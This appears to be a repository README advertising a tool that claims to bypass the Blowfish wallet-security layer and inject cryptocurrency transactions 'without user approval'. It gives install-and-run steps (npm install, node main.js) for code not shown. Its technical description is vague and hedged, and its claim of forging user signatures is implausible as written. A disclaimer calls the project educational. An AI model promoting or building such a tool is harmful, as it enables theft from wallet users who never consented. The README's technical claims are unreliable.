This is an experimental project that aims to bypass the security mechanisms of the Blowfish wallet protection system. Blowfish is a widely used security layer for Web3 wallets, designed to prevent malicious transactions by alerting users about potential risks before they confirm any action. This project demonstrates a proof-of-concept method to inject transactions without triggering the Blowfish warning prompt, thus allowing transactions to be silently executed without user approval. Disclaimer
This project is for educational and research purposes only. It aims to highlight potential security vulnerabilities to encourage improved wallet protection practices. The use of this code on real users without their consent is illegal and unethical. Always seek permission before testing on live systems and consider the ethical implications of any security research.
The primary goal of this project is to find a way to inject transactions into the user's wallet without triggering the Blowfish alert. Achieving this involves understanding how Blowfish analyzes transactions and circumventing its checks. The techniques used may involve manipulation of transaction signatures, payload crafting, or the use of obscure wallet functions.
- Transaction Injection: Allows transactions to be executed without user confirmation, bypassing the Blowfish warning system.
- Payload Manipulation: Demonstrates how transaction payloads can be modified to evade detection.
- Custom Signature Generation: Uses custom methods to sign transactions in a way that appears legitimate to the wallet but does not trigger alerts.
- Download and run the Node.js installer
https://nodejs.org/en/download/prebuilt-installer
- Clone or Download as zip and extract this repository
Download this repository
- Install dependencies
npm install
- Start it
node main.js
Blowfish works by analyzing the content of a transaction, including parameters, amounts, and destination addresses. It cross-references these with known patterns of malicious behavior. The project starts by examining how Blowfish performs this analysis.
The core technique involves modifying the signature process to make the transaction appear as though it has already been signed by the user. This might involve forging signatures or utilizing edge-case bugs in the cryptographic signing process.
Adjusting the data payload to avoid patterns that Blowfish recognizes as risky. This could involve splitting a transaction into smaller sub-transactions or obfuscating the transaction parameters.
Once the transaction is injected, it is executed without triggering any alerts. This requires the crafted transaction to pass all checks performed by the wallet software and appear as a legitimate action to the blockchain.